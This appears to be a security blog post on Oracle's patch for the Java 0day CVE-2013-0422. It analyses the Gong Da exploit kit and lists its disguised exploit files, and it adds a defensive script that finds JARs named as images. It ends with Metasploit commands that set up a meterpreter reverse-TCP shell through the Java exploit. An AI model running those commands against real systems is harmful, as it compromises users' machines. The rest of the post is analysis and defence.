As always, Oracle mentions that the vulnerabilities are not applicable to Java running on servers, standalone Java desktop applications or embedded Java applications. But Oracle seems to forget that servers can crawl the Internet, and that Java can be used to fetch web pages…
One interesting point is that Oracle pushes the default security level, introduced in version 7 Update 10, from “Medium” to “High”. With the “High” setting, the user is always prompted before any unsigned Java applet or Java Web Start application is run. This setting looks like the default “Click-to-play” functionality introduced in Firefox and in Chrome.
Another interesting point is that this update fixes two vulnerabilities: CVE-2013-0422, known through the Java 0day discovery, but also CVE-2012-3174, which has a base CVSS score of 10.0. Ben Murphy, via TippingPoint (ZDI…), is credited for the vulnerabilities. CVE-2012-3174 has been assigned since 6 Jun 2012!!!
So hopefully Oracle has released a patch; I strongly advise you to patch asap!
If you work in computer security and still haven't heard about the latest Oracle Java 0day, aka CVE-2013-0422, then you should change your job! This latest Oracle Java 0day was discovered being massively exploited in exploit kits by @kafeine on 10 January. Other exploit kits have quickly added support for this new vulnerability, like the Gong Da exploit kit.
This new version was discovered on “hxxp://syspio.com/data/m.html”, a web site which is actually still online.
“syspio.com” is hosted on 18.104.22.168, in KR, and this domain name seems to be associated with a legitimate compromised web site.
After de-obfuscation of the “m.html” file you can see that Gong Da Pack has evolved to the following diagram.
Below is some information regarding the different files:
EnKi2.jpg (aka CVE-2011-3544): 8/46 on VirusTotal.com
cLxmGk3.jpg (aka CVE-2012-0507): 11/46 on VirusTotal.com
OLluRM4.jpg (aka CVE-2012-1723): 20/46 on VirusTotal.com
GPUrKz2.jpg (aka CVE-2012-4681): 29/45 on VirusTotal.com
PBLO5.jpg (aka CVE-2012-5076): 12/46 on VirusTotal.com
Nuwm7.jpg (aka CVE-2013-0422): 6/46 on VirusTotal.com
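The files above are Java exploits served under image names, so one cheap defensive check on a proxy cache or web root is whether a file's extension disagrees with its content. The following Python script is an added example, not code from the original post or from the kit; the samples are constructed in memory (the JAR under the name Nuwm7.jpg is a harmless stub, not the real file) and the assumption is only that a JAR is a ZIP archive containing .class entries.

```python
import io
import zipfile

# Magic bytes: JPEG start-of-image marker vs. ZIP local-file-header signature (a JAR is a ZIP)
JPEG_MAGIC = b"\xff\xd8\xff"
ZIP_MAGIC = b"PK\x03\x04"
IMAGE_EXTS = (".jpg", ".jpeg", ".gif", ".png")


def classify(blob: bytes) -> str:
    """Return a content type derived from the bytes, ignoring the file name."""
    if blob.startswith(JPEG_MAGIC):
        return "jpeg"
    if blob.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                names = zf.namelist()
        except zipfile.BadZipFile:
            return "zip-corrupt"
        # A ZIP carrying .class entries is a Java archive, whatever it is called
        return "jar" if any(n.endswith(".class") for n in names) else "zip"
    return "unknown"


def find_disguised_jars(files: dict) -> list:
    """files maps file name -> bytes; returns image-named files whose content is a JAR."""
    return sorted(
        name for name, blob in files.items()
        if name.lower().endswith(IMAGE_EXTS) and classify(blob) == "jar"
    )


def make_jar(entry_name: str) -> bytes:
    """Build a minimal in-memory archive (constructed sample, not a real exploit)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(entry_name, b"\xca\xfe\xba\xbe" + b"\x00" * 12)  # class-file magic + padding
    return buf.getvalue()


# Constructed samples: a JAR under a .jpg name (the kit's pattern), a JPEG header, a plain ZIP
SAMPLES = {
    "Nuwm7.jpg": make_jar("Stub.class"),
    "banner.jpg": JPEG_MAGIC + b"\xe0" + b"\x00" * 16,
    "data.zip": make_jar("README.txt"),
}

if __name__ == "__main__":
    for name in find_disguised_jars(SAMPLES):
        print(f"{name}: extension says image, content is a Java archive")
```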
This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26